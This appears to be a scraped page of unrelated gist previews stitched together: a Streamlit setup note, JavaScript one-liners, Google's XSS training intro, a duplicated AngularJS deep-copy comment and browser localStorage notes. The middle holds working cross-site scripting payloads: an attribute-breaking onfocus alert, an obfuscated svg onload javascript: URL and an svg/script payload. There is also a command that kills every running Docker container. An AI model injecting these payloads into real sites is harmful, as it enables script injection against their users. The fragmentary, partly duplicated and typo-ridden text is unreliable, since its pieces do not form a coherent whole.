Example for discussion: https://discuss.streamlit.io/t/how-to-evolve-complex-state-e-g-annotate-data/
Install the requirements.
fastapi==0.42.0
streamlit==0.49.0
uvicorn==0.9.1
Run the server.
" onfocus="alert(1)" name="bounty | |
(Append #bounty to the URL and enjoy your zero interaction XSS ) | |
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
# Internet Explorer, Edge | |
<svg><script>alert(1)<p> | |
# Firefox |
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
license: gpl-3.0 | |
height: 960 | |
border: no | |
redirect: https://observablehq.com/@d3/hierarchical-edge-bundling |
// By @coderitual | |
// https://twitter.com/coderitual/status/1112297299307384833 | |
// Remove any duplicates from an array of primitives. | |
const unique = [...new Set(arr)] | |
// Sleep in async functions. Use: await sleep(2000). | |
const sleep = (ms) => (new Promise(resolve => setTimeout(resolve, ms))); | |
// Type this in your code to break chrome debugger in that line. |
Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!
At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.
In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.
There will be cake at the end of the test.
/** | |
* Deep copy example: | |
* angular.extend(true, { hello: 'world', app: { id: '1234', groups: [{ id: 1},2,3,4,5] }, ids: [1,2,3] }, { app: { name: 'bond', groups: [6, 7, {hello:'world', test: [1,2,3,4, [12,34,45]]}, 9] }, ids: [4,5,6,3] }); | |
* => "{"hello":"world","app":{"id":"1234","groups":[{"id":1},2,3,4,5,6,7,{"hello":"world","test":[1,2,3,4,[12,34,45]]},9],"name":"bond"},"ids":[1,2,3,4,5,6,3]}" | |
* | |
* Deep copy and dedup arrays | |
* angular.extend(true, true, { hello: 'world', app: { id: '1234', groups: [{ id: 1},2,3,4,5] }, ids: [1,2,3] }, { app: { name: 'bond', groups: [6, 7, {hello:'world', test: [1,2,3,4, [12,34,45]]}, 9] }, ids: [4,5,6,3] }); | |
* => "{"hello":"world","app":{"id":"1234","groups":[{"id":1},2,3,4,5,6,7,{"hello":"world","test":[1,2,3,4,[12,34,45]]},9],"name":"bond"},"ids":[1,2,3,4,5,6]}" | |
* | |
* vs jQuery deep copy |
/** | |
* Deep copy example: | |
* angular.extend(true, { hello: 'world', app: { id: '1234', groups: [{ id: 1},2,3,4,5] }, ids: [1,2,3] }, { app: { name: 'bond', groups: [6, 7, {hello:'world', test: [1,2,3,4, [12,34,45]]}, 9] }, ids: [4,5,6,3] }); | |
* => "{"hello":"world","app":{"id":"1234","groups":[{"id":1},2,3,4,5,6,7,{"hello":"world","test":[1,2,3,4,[12,34,45]]},9],"name":"bond"},"ids":[1,2,3,4,5,6,3]}" | |
* | |
* Deep copy and dedup arrays | |
* angular.extend(true, true, { hello: 'world', app: { id: '1234', groups: [{ id: 1},2,3,4,5] }, ids: [1,2,3] }, { app: { name: 'bond', groups: [6, 7, {hello:'world', test: [1,2,3,4, [12,34,45]]}, 9] }, ids: [4,5,6,3] }); | |
* => "{"hello":"world","app":{"id":"1234","groups":[{"id":1},2,3,4,5,6,7,{"hello":"world","test":[1,2,3,4,[12,34,45]]},9],"name":"bond"},"ids":[1,2,3,4,5,6]}" | |
* | |
* vs jQuery deep copy |
What happens to localStorage when different browsers are in private browsing mode? | |
Safari returns null for any item set using localStorage.setItem either before or during the private browsing session. | |
In essence, neither sessionStorage or localStorage are available in private brosing mode | |
Chrome and Opera return items set previous to private ("incognito") browsing, but once private browsing commences, treats localStorage like sessionStorage (only items set on the localStorage by that session will be returned) but like localStorage for other private windows and tabs | |
Firefox, like Chrome will not retrieve items set on locaStorage prior to a private session starting, but in private browsing treats localStorage like sessionStoroage for non private windows and tabs, but like localStorage for other private windows and tabs |